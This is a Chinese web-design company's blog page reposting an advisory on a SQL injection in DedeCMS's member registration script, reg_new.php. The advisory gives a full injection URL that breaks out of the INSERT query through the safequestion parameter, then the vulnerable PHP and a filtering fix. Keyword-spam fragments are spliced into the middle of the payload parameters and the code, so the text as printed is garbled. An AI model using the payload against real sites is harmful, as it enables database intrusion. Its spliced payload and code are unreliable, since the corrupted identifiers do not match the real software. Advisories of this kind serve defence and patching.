网站建设,程序开发一站式技术服务平台!
网站建设SEO优化联系方式
最新活动:电脑PC端+手机端+微网站+自适应网页多模板选择-建站388元起价!!!
当前位置:主页 > 网站建设 > dedecms织梦 /member/reg_new.php SQL注入漏,织梦教程

dedecms织梦 /member/reg_new.php SQL注入漏,织梦教程

时间:2023-07-17 11:07:17 阅读: 文章分类: 网站建设 作者: 织梦网站员

导读:织梦教程织梦教程1. 漏洞描述 Dedecms会员中心注入漏洞 2. 漏洞触发条件 http://127.0.0.1/dedecms5.7/member/reg_new.php织梦cms模板dede模板堂。

织梦cms模板dede模板堂1. 漏洞描述   Dedecms会员中心注入漏洞   2. 漏洞触发条件 /member/reg_new.php?dopost=regbase&step=1&mdede模板安装type=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpw织梦模板免费d=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree= //把vdcode=slum改成当前的验证码 3. 漏洞影响范围   4. 漏洞代码分析   /member/reg_new.php .. $jointime = time(); $logintime = time(); $joinip = GetIP(); $loginip = GetIP(); $pwd = md5($userpwd); $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0); //未对$mtype、$safeanswer、$safequestion进行有效过滤就带入SQL查询 $inQuery = "INSERT INTO `dede_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` , `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` ) VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores', '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; if($dsql->ExecuteNoneQuery($inQuery)) .. 5. 防御方法   /member/reg_new.php .. $jointime = time(); $logintime = time(); $joinip = GetIP(); $loginip = GetIP(); $pwd = md5($userpwd); /* 对$mtype、$safeanswer、$safequestion进行有效过滤 */ $mtype = HtmlReplace($mtype,1); $safeanswer = HtmlReplace($safeanswer); $saf织梦文章模板equestion = HtmlReplace($safequestion); /* */ $spaceSta = ($cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0); $inQuery = "INSERT INTO `dede_member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` , `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` ) VALUES ('$mtype','$userid','$pwd','$uname','$sex','10','$dfmoney','$email','$dfscores', '0','$spaceSta','','$safequestion','$safeanswer','$jointime','$joinip','$logintime','$loginip'); "; if($dsql->ExecuteNoneQuery($inQuery)) { ..

关键词标签: 标签 织梦 标题

声明: 本文由我的SEOUC技术文章主页发布于:2023-07-17 ,文章dedecms织梦 /member/reg_new.php SQL注入漏,织梦教程主要讲述标签,标题,织梦网站建设源码以及服务器配置搭建相关技术文章。转载请保留链接: https://www.seouc.com/article/web_28641.html

为你推荐与dedecms织梦 /member/reg_new.php SQL注入漏,织梦教程相关的文章

我的IDC 网站建设技术SEOUC.COM
专注网站建设,SEO优化,小程序设计制作搭建开发定制网站等,数千家网站定制开发案例,网站推广技术服务。
  • 5000+合作客服
  • 8年从业经验
  • 150+覆盖行业

    • 目录导航

    热门搜索标签 TAG全部标签

    最新热门源码技术文章

    关于本站

    专注于网站建设与seo优化的合理结合,以网页设计制作,网站排名搜索引擎优化排名,做网站,网站搭建,品牌建站为核心业务,数千家网站定制开发案例,服务全国各地企业和个人,提供有价值的高端建站和网站推广技术服务。

    联系我们

  • 驰岑网络
  • QQ:177891762
  • QQ:177891763
  • 微信:chicen_com

    • 微信公众号

    • 合作伙伴

  • [驰岑网络]
  • [支付程序]
  • [不良举报]

    • Copyright © 2002-2022 我的网站技术文章(www.seouc.com) 版权所有 黔ICP备2022003360号-4